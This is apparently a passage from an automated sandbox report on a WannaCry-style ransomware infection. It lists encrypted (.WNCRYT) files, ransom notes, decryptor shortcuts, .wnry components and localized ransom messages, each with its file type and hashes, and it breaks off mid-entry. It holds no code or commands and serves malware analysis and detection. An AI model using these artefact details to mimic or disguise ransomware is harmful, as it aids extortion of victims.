  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Videos\Sample Videos\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\Users\Public\Videos\Sample Videos\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7E6B6DA7C61FCB66F3F30166871DEF5B
  • SHA: 00F699CF9BBC0308F6E101283ECA15A7C566D4F9
  • SHA-256: 4A25D98C121BB3BD5B54E0B6A5348F7B09966BFFEEC30776E5A731813F05D49E
  • SHA-512: E5A56137F325904E0C7DE1D0DF38745F733652214F0CDB6EF173FA0743A334F95BED274DF79469E270C9208E6BDC2E6251EF0CDD81AF20FA1897929663E2C7D3
false
C:\Users\luketaylor\AppData\Local\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 14:36:52 2017, mtime=Fri May 12 14:36:52 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: C8427159B320E428E86A3896AA57E688
  • SHA: 741158513C303323983491EC912941AA00FE11A7
  • SHA-256: 1E460A542E942414C07D33416BC13BC48C422668A78725B275A9389FE620BE2E
  • SHA-512: 023B9D712CB194A5994FFF086998F9218498A76817A32D85ADC7154ED3340855171448BADB9D7FCA922649C9658F7EBF25CD6B048B901F314337301D05DC31DA
false
C:\Users\luketaylor\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Temp\Microsoft .NET Framework 4.6.2 Setup_20161220_084829697-MSI_netfx_Full_x86.msi.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Temp\dd_NDP462-KB3151800-x86-x64-AllOS-ENU_decompression_log.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Temp\dd_SetupUtility.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\luketaylor\AppData\Local\Temp\dd_wcf_CA_smci_20161220_074953_666.txt.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\b.wnry
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: C17170262312F3BE7027BC2CA825BF0C
  • SHA: F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
  • SHA-256: D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
  • SHA-512: C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
false
C:\c.wnry
  • Type: data
  • MD5: 7DD97660F4842221C0062A863C4500B7
  • SHA: F93E7CC9FC7127789C615593D08C8CD3B0D08724
  • SHA-256: 855598BDC246DA30223475FEFE2EC134BCC8214D2D82803FF2181C6E924B77B1
  • SHA-512: D9FCD1FFA798D4712EA715943275A60939C52BAA6E312B53BF9CFE3BDC586F7EC6070BA89B7DD3E5927FF9E2898BBAB485948137D94BCB959B032C72DDDBDF92
false
C:\f.wnry
  • Type: ASCII text, with CRLF line terminators
  • MD5: E26CF2873B2373144AA64F130BBF0ECA
  • SHA: D3EB3FC90B1C3970F8E2B3C9BFC50D3024E14C34
  • SHA-256: A14CC7F108DC1D518CFBC0D89E22C950B053DB079C78095598EC832BFADB4A17
  • SHA-512: 1DE61F3159FEA9CEEBA482E669E3FCB66E18901402F25511ADE05F9F29857F45F1D42ADBDC61CDB6026B9C0BA22B4E71F0D4359C0EEBE89B0B302E1815B8C103
false
C:\m.vbs
  • Type: ASCII text, with CRLF line terminators
  • MD5: 800446EC5D8B6041F6B08693D8AA1D53
  • SHA: 39B9E242AF021EE4DAA31956F5E786F5D8F9D62C
  • SHA-256: 51432D3196D9B78BDC9867A77D601CAFFD4ADAA66DCAC944A5BA0B3112BBEA3B
  • SHA-512: 48FE611107DC9E62982F0812DB89D8F91A795DAB738BA3A9B21BE1FE1B50D32B7375D2930CD9B1A1EB2164E386973B5B06C208AEE20660F50249F6F1ECE081D2
false
C:\msg\m_bulgarian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 95673B0F968C0F55B32204361940D184
  • SHA: 81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
  • SHA-256: 40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
  • SHA-512: 7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
false
C:\msg\m_chinese (simplified).wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 0252D45CA21C8E43C9742285C48E91AD
  • SHA: 5C14551D2736EEF3A1C1970CC492206E531703C1
  • SHA-256: 845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
  • SHA-512: 1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
false
C:\msg\m_chinese (traditional).wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 2EFC3690D67CD073A9406A25005F7CEA
  • SHA: 52C07F98870EABACE6EC370B7EB562751E8067E9
  • SHA-256: 5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
  • SHA-512: 0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
false
C:\msg\m_croatian.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 17194003FA70CE477326CE2F6DEEB270
  • SHA: E325988F68D327743926EA317ABB9882F347FA73
  • SHA-256: 3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
  • SHA-512: DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
false
C:\msg\m_czech.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 537EFEECDFA94CC421E58FD82A58BA9E
  • SHA: 3609456E16BC16BA447979F3AA69221290EC17D0
  • SHA-256: 5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
  • SHA-512: E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
false
C:\msg\m_danish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 2C5A3B81D5C4715B7BEA01033367FCB5
  • SHA: B548B45DA8463E17199DAAFD34C23591F94E82CD
  • SHA-256: A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
  • SHA-512: 490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
false
C:\msg\m_dutch.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 7A8D499407C6A647C03C4471A67EAAD7
  • SHA: D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
  • SHA-256: 2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
  • SHA-512: 608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
false
C:\msg\m_english.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: FE68C2DC0D2419B38F44D83F2FCF232E
  • SHA: 6C6E49949957215AA2F3DFB72207D249ADF36283
  • SHA-256: 26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
  • SHA-512: 941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
false
C:\msg\m_filipino.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 08B9E69B57E4C9B966664F8E1C27AB09
  • SHA: 2DA1025BBBFB3CD308070765FC0893A48E5A85FA
  • SHA-256: D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
  • SHA-512: 966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
false
C:\msg\m_finnish.wnry
  • Type: Rich Text Format data, version 1, unknown character set
  • MD5: 35C2F97EEA8819B1CAEBD23FEE732D8F
